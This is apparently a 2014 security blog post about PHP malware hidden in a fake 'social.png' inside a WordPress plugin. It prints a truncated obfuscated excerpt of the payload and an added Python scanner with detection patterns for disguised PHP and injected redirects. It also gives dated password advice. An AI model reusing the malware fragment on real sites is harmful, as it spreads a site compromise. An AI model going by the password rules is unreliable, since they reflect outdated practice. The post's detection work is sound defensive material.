sneaky social.png is not your friend – it contains malware!

April 15, 2014 | Blog, PHP Security, News & Information, WordPress Security

Over the past week we came across a couple of instances of interesting malware that was not easily detected. We called it the sneaky social.png. It’s not really an image – if you were to open it up in a text editor, you would more than likely see this:

< ? php error_reporting( 0 ) ; if (!defined('WP_OPTION_KEY')) { function txyFqaETRPUyiEgQatokJIY() { define('WP_OPTION_KEY','c'); new GsSYoMTsQibQgcHcuGmrg(); } add_action('init', 'txyFqaETRPUyiEgQatokJIY'); } class VtkddwvkYgCDDRRWbgRtw{ private $AcheTwkrhTtKmyatQGqYFc, $SntMBKFkfTlUzXyNVQedo, $YcmysXeieEGqvkjRIsPYg; public function __construct($BZaxGALPLdVfntBIQWUPs = 'old'){ if ($BZaxGALPLdVfntBIQWUPs == 'new'){ $this->QxEolVsSqvJZyRSgHFmL(); } else { $this->yOlGcuINHlzAVPznEbGNvwJM(); } $this->SntMBKFkfTlUzXyNVQedo = .......

You can see the full details of the code here: http://pastebin.com/aTyVvr0D

In this particular instance, it was packaged with a plugin that the client had installed on his WordPress site – sneaky. What it did was create a redirect to a Justin Bieber video on YouTube, by inserting a custom option into the wp_options table. So if you find one of these on your server, you may also need to check your wp_options table for the option that it added. In other cases we saw, the malicious redirect was simply in the social.png file that was included in a page – much easier to clean up, that’s for sure!
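Two quick checks a site owner can run for the pattern described above, as an added example that is not code from the original post: flag image-named files under wp-content that carry a PHP open tag instead of (or, as a generalisation, in addition to) a real image header, and flag wp_options values that carry redirect or obfuscation markers. The sample files, the option value and the marker list are constructed here, not the real option the malware added.

```python
import os
import re
import tempfile

IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif")
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
# Markers that a redirect or obfuscated payload stored in option_value tends to carry
OPTION_MARKERS = re.compile(
    r"<script|window\.location|location\.href|<meta[^>]+refresh|"
    r"header\s*\(\s*['\"]Location|eval\s*\(|base64_decode|gzinflate", re.IGNORECASE)

def classify_image_bytes(data: bytes) -> str:
    """'ok': no PHP tag. 'php_disguised': PHP tag and no image header (the
    social.png case). 'php_embedded': real image header with a PHP tag inside."""
    if PHP_TAG.search(data) is None:
        return "ok"
    looks_like_image = any(data.startswith(m) for m in IMAGE_MAGIC)
    return "php_embedded" if looks_like_image else "php_disguised"

def scan_uploads(root: str) -> list:
    """Walk root (e.g. wp-content); return (path, verdict) for image-named files holding PHP."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(IMAGE_EXT):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    verdict = classify_image_bytes(fh.read(65536))
                if verdict != "ok":
                    findings.append((path, verdict))
    return sorted(findings)

def suspicious_option(option_value: str) -> list:
    """Markers found in one wp_options.option_value; an empty list means none seen."""
    return [m.group(0) for m in OPTION_MARKERS.finditer(option_value)]

def demo() -> dict:
    """Build a constructed wp-content tree and a constructed option row, run both checks."""
    root = tempfile.mkdtemp(prefix="wp-content-")
    os.makedirs(os.path.join(root, "uploads"))
    samples = {  # constructed stand-ins, not the real malware
        "uploads/real.png": IMAGE_MAGIC[0] + b"\x00" * 32,
        "uploads/social.png": b"<?php error_reporting(0); /* constructed stand-in */",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    option_value = '<script>window.location="https://www.youtube.com/watch?v=PLACEHOLDER"</script>'
    return {"files": [(os.path.basename(p), v) for p, v in scan_uploads(root)],
            "option_markers": suspicious_option(option_value)}

if __name__ == "__main__":
    print(demo())
```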

Once you have cleaned and restored your site to normal, if you haven’t already, change ALL passwords: FTP, cPanel and administrator accounts. Make sure you do not have any FTP accounts on your server that should not be there. Use strong passwords of 8-12 alpha-numeric characters with at least 1 symbol (!, @, #, etc.), and change them often (every 30-60 days). Better yet, if your host allows it, use SFTP (FTP sends your credentials in plain text, which allows attackers to “sniff” them).

And last but not least – scan your local machine (or that of your developer, web designer or site admin, if it’s not you) for possible viruses, trojans and keyloggers. There are several free scanners available, such as the free version from avg.com and malwarebytes.org. We typically recommend you run more than one, because NO anti-virus scan is 100% fail-safe.

If you aren’t technical and you need immediate assistance, we can reduce the impact and prevent further damage quickly. Now is your chance: we can have the typical site cleaned and secured in just a few hours. Check out our Pricing page for details on our professional, reliable malware removal services.